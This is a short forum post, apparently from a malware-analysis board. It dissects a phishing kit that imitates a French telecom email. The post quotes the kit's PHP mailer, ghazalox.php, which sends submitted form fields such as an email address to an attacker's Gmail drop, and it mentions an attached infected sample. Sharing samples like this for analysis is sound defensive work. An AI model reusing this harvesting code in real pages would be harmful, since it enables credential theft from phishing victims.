                  style="FONT-FAMILY: Arial,Helvetica,sans-serif; COLOR: #656565; FONT-SIZE: 10px"><SPAN 
                  style="FONT-SIZE: x-small">Merci de ne pas répondre à ce 
                  courrier électronique. </SPAN></SPAN></SPAN><BR><BR><SPAN 
                  style="FONT-SIZE: 10pt"><SPAN 
                  style="FONT-FAMILY: Arial,Helvetica,sans-serif; COLOR: #656565; FONT-SIZE: 10px"><SPAN 
                  style="FONT-SIZE: x-small">*3900 (service commercial) - temps 
                  d’attente gratuit, puis coût d’une communication locale ; 
                  depuis la ligne d’un autre opérateur, consulter ses 
                  tarifs</SPAN></SPAN></SPAN></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>
<DIV id=_rc_sig> </DIV></BODY></HTML>
ghazalox.php:
Code: Select all
$send = "ayoub.boos7@gmail.com";

$subject = "BoOooOooOs Rezuult";
$headers = "Frm: ayoub.boos7@gmail.com>";
$headers .= $_POST['eMAdd']."\n";
$headers .= "MIME-Version: 1.0\n";

mail($send,$subject,$message,$headers);
additional stuff: http://www.kernelmode.info/forum/viewto ... =20#p18118
Attachments
infected
(57.38 KiB) Downloaded 87 times
 Return to “Malware”